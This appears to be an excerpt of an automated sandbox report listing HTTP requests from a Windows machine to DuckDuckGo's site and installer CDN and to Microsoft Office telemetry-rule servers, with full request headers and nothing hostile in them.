Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/web-protection-back-light.png HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Range: bytes=177813-182029If-Range: "67049d23-2c70e"
Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /about HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/data/kMKb7Bj0jhFmsUIWJjIQE/index.json HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /static-assets/backgrounds/about-bg-sm.jpg HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/static/css/df680b227823b9ab.css HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/data/kMKb7Bj0jhFmsUIWJjIQE/index.json HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/backgrounds/about-bg-md-lg.jpg HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /static-assets/backgrounds/about-fg-sm.svg HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/backgrounds/about-fg-md-lg.svg HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/backgrounds/about-bg-dark-sm.jpg HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/backgrounds/about-bg-sm.jpg HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/backgrounds/about-bg-dark-md-lg.jpg HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /static-assets/backgrounds/about-bg-md-lg.jpg HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /static-assets/backgrounds/about-fg-dark-sm.svg HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/backgrounds/about-fg-dark-md-lg.svg HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/about-62f92f4232f2836a.js HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Range: bytes=161391-161391If-Range: "67049d1f-2d022"
Source: global trafficHTTP traffic detected: GET /_next/static/media/climber.4590e32c.jpg HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/index-51d8b73bfd4680e3.js HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /static-assets/backgrounds/about-bg-dark-sm.jpg HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/backgrounds/about-fg-sm.svg HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/backgrounds/about-fg-md-lg.svg HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/backgrounds/about-bg-dark-md-lg.jpg HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/33817-15efb19a99b7ec93.js HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /static-assets/backgrounds/about-fg-dark-sm.svg HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /static-assets/backgrounds/about-fg-dark-md-lg.svg HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/css/335c19410475e349.css HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/css/7cfb7e019667ac45.css HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/css/e129782d9e96eedb.css HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/about-62f92f4232f2836a.js HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/index-51d8b73bfd4680e3.js HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/static/media/climber.4590e32c.jpg HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /windows?origin=funnel_home___details HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /windows-desktop-browser/installer/funnel_home___details/DuckDuckGo.appinstaller HTTP/1.1Host: staticcdn.duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
